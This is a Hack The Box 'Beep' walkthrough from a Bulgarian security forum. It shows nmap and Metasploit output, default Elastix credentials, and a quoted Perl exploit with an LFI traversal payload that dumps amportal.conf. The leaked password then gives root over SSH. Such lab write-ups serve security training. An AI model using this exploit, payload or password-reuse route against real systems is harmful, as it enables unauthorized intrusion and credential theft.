Преминете към съдържанието

МЕУ организира кампания за пентестове в държавната администрация

Целта на кампанията е да подобри киберсигурността в държавната администрация, като участието в нея е доброволно и не се обвързва с възнаграждение.
Прочети повече за програмата

Добре дошли в Хакинг.БГ! 

Всеки един от нас стои на раменете на гигантите, споделили знанията и опита си с нас.

Този форум е нашият начин да върнем жеста за бъдещите и текущите кадри в киберсигурността.

Стремим се да предоставим платформа, където членовете могат да развиват своите умения, като се дава приоритет на етиката, сигурността и поверителността!

  • HTB - WriteUps




# Enumeration
The nmap scan enumerated 16 open ports running a variety of services. 

Nmap scan report for
Host is up (0.049s latency).
Not shown: 65519 closed ports
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            875/udp   status
|_  100024  1            878/tcp   status
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
443/tcp   open  ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
|_ssl-date: 2021-04-12T10:58:07+00:00; +3m45s from scanner time.
878/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).


# Web Application 
## Port 80
Going to I was greeted by the following login page:
![[Pasted image 20210412140605.png]]
## Port 10000
The nmap scan revealed Webmin httpd service on port 10k. Let's see it:
![[Pasted image 20210412142951.png]]

Hmm, interesting. From the URL I can see a ***.cgi*** extension. Let's google the file '*session_login.cgi*'. The results are quite interesting. Let's save some time and try to use "vuln.nse" on port 10k:

# nmap -sV -p 10000 --script vuln                                                                                                           1 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-12 07:46 EDT

Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Stats: 0:00:41 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 66.20% done; ETC: 07:47 (0:00:00 remaining)
Nmap scan report for
Host is up (0.050s latency).

10000/tcp open  http    MiniServ 1.570 (Webmin httpd)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-litespeed-sourcecode-download: 
| Litespeed Web Server Source Code Disclosure (CVE-2010-2333)
| /index.php source code:
| <h1>Error - Bad Request</h1>
|_<pre>This web server is running in SSL mode. Try the URL <a href=''></a> instead.<br></pre>
|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)
| http-phpmyadmin-dir-traversal: 
|   phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
|     State: UNKNOWN (unable to test)
|     IDs:  CVE:CVE-2005-3299
|       PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
|     Disclosure date: 2005-10-nil
|     Extra information:
|       ../../../../../etc/passwd :
|   <h1>Error - Bad Request</h1>
|   <pre>This web server is running in SSL mode. Try the URL <a href=''></a> instead.<br></pre>
|     References:
|       http://www.exploit-db.com/exploits/1244/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2006-3392: 
|   Webmin File Disclosure
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2006-3392
|       Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.
|       This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences
|       to bypass the removal of "../" directory traversal sequences.
|     Disclosure date: 2006-06-29
|     References:
|       http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure
|       http://www.exploit-db.com/exploits/1997/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)

Apparently there could be local file inclusion and file disclosure vulnerabilities. 

msf6 auxiliary(admin/webmin/file_disclosure) > options

Module options (auxiliary/admin/webmin/file_disclosure):

   Name     Current Setting   Required  Description
   ----     ---------------   --------  -----------
   DIR      /unauthenticated  yes       Webmin directory path
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:
   RPATH    /etc/passwd       yes       The file to download
   RPORT    10000             yes       The target port (TCP)
   SSL      false             no        Negotiate SSL/TLS for outgoing connections
   VHOST                      no        HTTP server virtual host

Auxiliary action:

   Name      Description
   ----      -----------
   Download  Download arbitrary file

msf6 auxiliary(admin/webmin/file_disclosure) > set RHOSTS
msf6 auxiliary(admin/webmin/file_disclosure) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 auxiliary(admin/webmin/file_disclosure) > exploit
[*] Running module against

[*] Attempting to retrieve /etc/passwd...
[*] The server returned: 404 File not found
<h1>Error - File not found</h1>
[*] Auxiliary module execution completed


Ok, so we receive a 404 File not found for /etc/passwd... Hm.. I have tried running it a couple more times until I decided to postpone it and look for other stuff.

# Elastix
 Elastix is an unified communications server software that brings together IP PBX, email, IM, faxing and collaboration functionality. It has a Web interface and includes capabilities such as a call center software with predictive dialing. 
 ## Elastix default username:passwords
 Quick google search reveals the following interesting pages:
 [Elastix Default Login Password](https://www.elastix.org/community/threads/default-passwords-not-password.8416/).
 I have tried the following credentials with no success.

Elastix PBX Default Credentials Elastix PBX systems install with multiple default passwords according to the wiki manual: Initial access to the Web interface Enter in the Web interface: Open web browser and go to https://ip-address-of-elastix-server/ Username: admin Password: one you assigned @ install Initial access to third party applications 
 1. To use Sugar CRM: 
 Username: admin Password: password
 2. To use A2bill:
 Username: admin Password: mypassword
 3. Operator Flash Panel (from 0.6 version):
 Password: eLaStIx.2oo7
 4. For accessing Freepbx (without being contracted) use:
 Username: admin Password: admin
 5. For accessing vtigerCRM use:
 Username: admin Password: admin

 ## Searchsploit

# searchsploit elastix                                                                                                                                 1 ⨯
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                             |  Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Elastix - 'page' Cross-Site Scripting                                                                                      | php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulnerabilities                                                                    | php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities                                                              | php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclusion                                                                           | php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection                                                                                          | php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection                                                                                         | php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution                                                                     | php/webapps/18650.py
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

After researching the exploits I found that according to [Security Focus](https://www.securityfocus.com/bid/55078/discuss)

Elastix 'graph.php' Local File Include Vulnerability  
Elastix is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.  
An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks.  
Elastix 2.2.0 is vulnerable; other versions may also be affected.


Ok, Let's locate the ***graph.php*** exploit on our machine


# locate 37637.pl


The exploit's code: 

# cat 37637.pl 
source: https://www.securityfocus.com/bid/55078/info

Elastix is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks.

Elastix 2.2.0 is vulnerable; other versions may also be affected. 

#!/usr/bin/perl -w

#Elastix is an Open Source Sofware to establish Unified Communications. 
#About this concept, Elastix goal is to incorporate all the communication alternatives,
#available at an enterprise level, into a unique solution.
# Exploit Title: Elastix 2.2.0 LFI
# Google Dork: :(
# Author: cheki
# Version:Elastix 2.2.0
# Tested on: multiple
# CVE : notyet
# romanc-_-eyes ;) 
# Discovered by romanc-_-eyes
# vendor http://www.elastix.org/

print "\t Elastix 2.2.0 LFI Exploit \n";
print "\t code author cheki   \n";
print "\t 0day Elastix 2.2.0  \n";
print "\t email: anonymous17hacker{}gmail.com \n";

#LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../../etc/amportal.conf%00&module=Accounts&action

use LWP::UserAgent;
print "\n Target: https://ip ";
chomp(my $target=<STDIN>);

$code = LWP::UserAgent->new() or die "inicializacia brauzeris\n";
$code->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/".$dir."/graph.php?".$poc."=".$jump."".$etc."/".$test."&module=Accounts&action";
$res = $code->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~ 'This file is part of FreePBX') {
print "\n read amportal.conf file : $answer \n\n";
print " successful read\n";
else { 
print "\n[-] not successful\n";


So, let's go to the application and manually test it for LFI.


# This file is part of FreePBX. # # FreePBX is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 2 of the License, or # (at your option) any later version. # # FreePBX is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with FreePBX. If not, see . # # This file contains settings for components of the Asterisk Management Portal # Spaces are not allowed! # Run /usr/src/AMP/apply_conf.sh after making changes to this file # FreePBX Database configuration # AMPDBHOST: Hostname where the FreePBX database resides # AMPDBENGINE: Engine hosting the FreePBX database (e.g. mysql) # AMPDBNAME: Name of the FreePBX database (e.g. asterisk) # AMPDBUSER: Username used to connect to the FreePBX database # AMPDBPASS: Password for AMPDBUSER (above) # AMPENGINE: Telephony backend engine (e.g. asterisk) # AMPMGRUSER: Username to access the Asterisk Manager Interface # AMPMGRPASS: Password for AMPMGRUSER # AMPDBHOST=localhost AMPDBENGINE=mysql # AMPDBNAME=asterisk AMPDBUSER=asteriskuser # AMPDBPASS=amp109 AMPDBPASS=jEhdIekWmdjE AMPENGINE=asterisk AMPMGRUSER=admin #AMPMGRPASS=amp111 AMPMGRPASS=jEhdIekWmdjE # AMPBIN: Location of the FreePBX command line scripts # AMPSBIN: Location of (root) command line scripts # AMPBIN=/var/lib/asterisk/bin AMPSBIN=/usr/local/sbin # AMPWEBROOT: Path to Apache's webroot (leave off trailing slash) # AMPCGIBIN: Path to Apache's cgi-bin dir (leave off trailing slash) # AMPWEBADDRESS: The IP address or host name used to access the AMP web admin # AMPWEBROOT=/var/www/html AMPCGIBIN=/var/www/cgi-bin # AMPWEBADDRESS=x.x.x.x|hostname # FOPWEBROOT: Path to the Flash Operator Panel webroot (leave off trailing slash) # FOPPASSWORD: Password for performing transfers and hangups in the Flash Operator Panel # FOPRUN: Set to true if you want FOP started by freepbx_engine (amportal_start), false otherwise # FOPDISABLE: Set to true to disable FOP in interface and retrieve_conf. Useful for sqlite3 # or if you don't want FOP. # #FOPRUN=true FOPWEBROOT=/var/www/html/panel #FOPPASSWORD=passw0rd FOPPASSWORD=jEhdIekWmdjE # FOPSORT=extension|lastname # DEFAULT VALUE: extension # FOP should sort extensions by Last Name [lastname] or by Extension [extension] # This is the default admin name used to allow an administrator to login to ARI bypassing all security. # Change this to whatever you want, don't forget to change the ARI_ADMIN_PASSWORD as well ARI_ADMIN_USERNAME=admin # This is the default admin password to allow an administrator to login to ARI bypassing all security. # Change this to a secure password. ARI_ADMIN_PASSWORD=jEhdIekWmdjE # AUTHTYPE=database|none # Authentication type to use for web admininstration. If type set to 'database', the primary # AMP admin credentials will be the AMPDBUSER/AMPDBPASS above. AUTHTYPE=database # AMPADMINLOGO=filename # Defines the logo that is to be displayed at the TOP RIGHT of the admin screen. This enables # you to customize the look of the administration screen. # NOTE: images need to be saved in the ..../admin/images directory of your AMP install # This image should be 55px in height AMPADMINLOGO=logo.png # USECATEGORIES=true|false # DEFAULT VALUE: true # Controls if the menu items in the admin interface are sorted by category (true), or sorted # alphabetically with no categories shown (false). # AMPEXTENSIONS=extensions|deviceanduser # Sets the extension behavior in FreePBX. If set to 'extensions', Devices and Users are # administered together as a unified Extension, and appear on a single page. # If set to 'deviceanduser', Devices and Users will be administered seperately. Devices (e.g. # each individual line on a SIP phone) and Users (e.g. '101') will be configured # independent of each other, allowing association of one User to many Devices, or allowing # Users to login and logout of Devices. AMPEXTENSIONS=extensions # ENABLECW=true|false ENABLECW=no # DEFAULT VALUE: true # Enable call waiting by default when an extension is created. Set to 'no' to if you don't want # phones to be commissioned with call waiting already enabled. The user would then be required # to dial the CW feature code (*70 default) to enable their phone. Most installations should leave # this alone. It allows multi-line phones to receive multiple calls on their line appearances. # CWINUSEBUSY=true|false # DEFAULT VALUE: true # For extensions that have CW enabled, report unanswered CW calls as 'busy' (resulting in busy # voicemail greeting). If set to no, unanswered CW calls simply report as 'no-answer'. # AMPBADNUMBER=true|false # DEFAULT VALUE: true # Generate the bad-number context which traps any bogus number or feature code and plays a # message to the effect. If you use the Early Dial feature on some Grandstream phones, you # will want to set this to false. # AMPBACKUPSUDO=true|false # DEFAULT VALUE: false # This option allows you to use sudo when backing up files. Useful ONLY when using AMPPROVROOT # Allows backup and restore of files specified in AMPPROVROOT, based on permissions in /etc/sudoers # for example, adding the following to sudoers would allow the user asterisk to run tar on ANY file # on the system: # asterisk localhost=(root)NOPASSWD: /bin/tar # Defaults:asterisk !requiretty # PLEASE KEEP IN MIND THE SECURITY RISKS INVOLVED IN ALLOWING THE ASTERISK USER TO TAR/UNTAR ANY FILE # CUSTOMASERROR=true|false # DEFAULT VALUE: true # If false, then the Destination Registry will not report unknown destinations as errors. This should be # left to the default true and custom destinations should be moved into the new custom apps registry. # DYNAMICHINTS=true|false # DEFAULT VALUE: false # If true, Core will not statically generate hints, but instead make a call to the AMPBIN php script, # and generate_hints.php through an Asterisk's #exec call. This requires Asterisk.conf to be configured # with "execincludes=yes" set in the [options] section. # XTNCONFLICTABORT=true|false # BADDESTABORT=true|false # DEFAULT VALUE: false # Setting either of these to true will result in retrieve_conf aborting during a reload if an extension # conflict is detected or a destination is detected. It is usually better to allow the reload to go # through and then correct the problem but these can be set if a more strict behavior is desired. # SERVERINTITLE=true|false # DEFAULT VALUE: false # Precede browser title with the server name. # USEDEVSTATE = true|false # DEFAULT VALUE: false # If this is set, it assumes that you are running Asterisk 1.4 or higher and want to take advantage of the # func_devstate.c backport available from Asterisk 1.6. This allows custom hints to be created to support # BLF for server side feature codes such as daynight, followme, etc. # MODULEADMINWGET=true|false # DEFAULT VALUE: false # Module Admin normally tries to get its online information through direct file open type calls to URLs that # go back to the freepbx.org server. If it fails, typically because of content filters in firewalls that # don't like the way PHP formats the requests, the code will fall back and try a wget to pull the information. # This will often solve the problem. However, in such environment there can be a significant timeout before # the failed file open calls to the URLs return and there are often 2-3 of these that occur. Setting this # value will force FreePBX to avoid the attempt to open the URL and go straight to the wget calls. # AMPDISABLELOG=true|false # DEFAULT VALUE: true # Whether or not to invoke the FreePBX log facility # AMPSYSLOGLEVEL=LOG_EMERG|LOG_ALERT|LOG_CRIT|LOG_ERR|LOG_WARNING|LOG_NOTICE|LOG_INFO|LOG_DEBUG|LOG_SQL|SQL # DEFAULT VALUE: LOG_ERR # Where to log if enabled, SQL, LOG_SQL logs to old MySQL table, others are passed to syslog system to # determine where to log # AMPENABLEDEVELDEBUG=true|false # DEFAULT VALUE: false # Whether or not to include log messages marked as 'devel-debug' in the log system # AMPMPG123=true|false # DEFAULT VALUE: true # When set to false, the old MoH behavior is adopted where MP3 files can be loaded and WAV files converted # to MP3. The new default behavior assumes you have mpg123 loaded as well as sox and will convert MP3 files # to WAV. This is highly recommended as MP3 files heavily tax the system and can cause instability on a busy # phone system. # CDR DB Settings: Only used if you don't use the default values provided by FreePBX. # CDRDBHOST: hostname of db server if not the same as AMPDBHOST # CDRDBPORT: Port number for db host # CDRDBUSER: username to connect to db with if it's not the same as AMPDBUSER # CDRDBPASS: password for connecting to db if it's not the same as AMPDBPASS # CDRDBNAME: name of database used for cdr records # CDRDBTYPE: mysql or postgres mysql is default # CDRDBTABLENAME: Name of the table in the db where the cdr is stored cdr is default # AMPVMUMASK=mask # DEFAULT VALUE: 077 # Defaults to 077 allowing only the asterisk user to have any permission on VM files. If set to something # like 007, it would allow the group to have permissions. This can be used if setting apache to a different # user then asterisk, so that the apache user (and thus ARI) can have access to read/write/delete the # voicemail files. If changed, some of the voicemail directory structures may have to be manually changed. # DASHBOARD_STATS_UPDATE_TIME=integer_seconds # DEFAULT VALUE: 6 # DASHBOARD_INFO_UPDATE_TIME=integer_seconds # DEFAULT VALUE: 20 # These can be used to change the refresh rate of the System Status Panel. Most of # the stats are updated based on the STATS interval but a few items are checked # less frequently (such as Asterisk Uptime) based on the INFO value # ZAP2DAHDICOMPAT=true|false ZAP2DAHDICOMPAT=true # DEFAULT VALUE: false # If set to true, FreePBX will check if you have chan_dadhi installed. If so, it will # automatically use all your ZAP configuration settings (devices and trunks) and # silently convert them, under the covers, to DAHDI so no changes are needed. The # GUI will continue to refer to these as ZAP but it will use the proper DAHDI channels. # This will also keep Zap Channel DIDs working. # CHECKREFERER=true|false # DEFAULT VALUE: true # When set to the default value of true, all requests into FreePBX that might possibly add/edit/delete # settings will be validated to assure the request is coming from the server. This will protect the system # from CSRF (cross site request forgery) attacks. It will have the effect of preventing legitimately entering # URLs that could modify settings which can be allowed by changing this field to false. # USEQUEUESTATE=true|false # DEFAULT VALUE: false # Setting this flag will generate the required dialplan to integrate with the following Asterisk patch: # https://issues.asterisk.org/view.php?id=15168 # This feature is planned for a future 1.6 release but given the existence of the patch can be used prior. Once # the release version is known, code will be added to automatically enable this format in versions of Asterisk # that support it. # USEGOOGLEDNSFORENUM=true|false # DEFAULT VALUE: false # Setting this flag will generate the required global variable so that enumlookup.agi will use Google DNS # when performing an ENUM lookup. Not all DNS deals with NAPTR record, but Google does. There is a # drawback to this as Google tracks every lookup. If you are not comfortable with this, do not enable this # setting. Please read Google FAQ about this: http://code.google.com/speed/public-dns/faq.html#privacy # MOHDIR=subdirectory_name # This is the subdirectory for the MoH files/directories which is located in ASTVARLIBDIR # if not specified it will default to mohmp3 for backward compatibility. MOHDIR=mohmp3 # RELOADCONFIRM=true|false # DEFAULT VALUE: true # When set to false, will bypass the confirm on Reload Box # FCBEEPONLY=true|false # DEFAULT VALUE: false # When set to true, a beep is played instead of confirmation message when activating/de-activating: # CallForward, CallWaiting, DayNight, DoNotDisturb and FindMeFollow # DISABLECUSTOMCONTEXTS=true|false # DEFAULT VALUE: false # Normally FreePBX auto-generates a custom context that may be usable for adding custom dialplan to modify the # normal behavior of FreePBX. It takes a good understanding of how Asterisk processes these includes to use # this and in many of the cases, there is no useful application. All includes will result in a WARNING in the # Asterisk log if there is no context found to include though it results in no errors. If you know that you # want the includes, you can set this to true. If you comment it out FreePBX will revert to legacy behavior # and include the contexts. # AMPMODULEXML lets you change the module repository that you use. By default, it # should be set to http://mirror.freepbx.org/ - Presently, there are no third # party module repositories. AMPMODULEXML=http://mirror.freepbx.org/ # AMPMODULESVN is the prefix that is appended to tags in the XML file. # This should be set to http://mirror.freepbx.org/modules/ AMPMODULESVN=http://mirror.freepbx.org/modules/ AMPDBNAME=asterisk ASTETCDIR=/etc/asterisk ASTMODDIR=/usr/lib/asterisk/modules ASTVARLIBDIR=/var/lib/asterisk ASTAGIDIR=/var/lib/asterisk/agi-bin ASTSPOOLDIR=/var/spool/asterisk ASTRUNDIR=/var/run/asterisk ASTLOGDIR=/var/log/asteriskSorry! Attempt to access restricted file.


The above output reveals credentials in amportal.config file:

User: admin/root | Password: jEhdIekWmdjE

...And login successful:

Perhaps we could ssh?

# ssh [email protected]                                                                                                                                                                                                                255 ⨯
Unable to negotiate with port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1


I have received an error which according to an opinion on the internet - it is received since the algorithm is considered legacy? Resolved it by manually selecting it.


# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 [email protected]                                                                                                                                                                    255 ⨯
The authenticity of host ' (' can't be established.
RSA key fingerprint is SHA256:Ip2MswIVDX1AIEPoLiHsMFfdg1pEJ0XXD5nFEjki/hI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (RSA) to the list of known hosts.
[email protected]'s password: 
Last login: Tue Jul 16 11:45:47 2019

Welcome to Elastix 

To access your Elastix System, using a separate workstation (PC/MAC/Linux)
Open the Internet Browser using the following URL:

[root@beep ~]# 
[root@beep ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)


The host reused his password so we're able to gain root through ssh.


Recommended Comments

Няма коментари

HACKING.BG Партньори


  • Създай ново...

Важна информация!

Политика за сигурност и условия на ползване Privacy Policy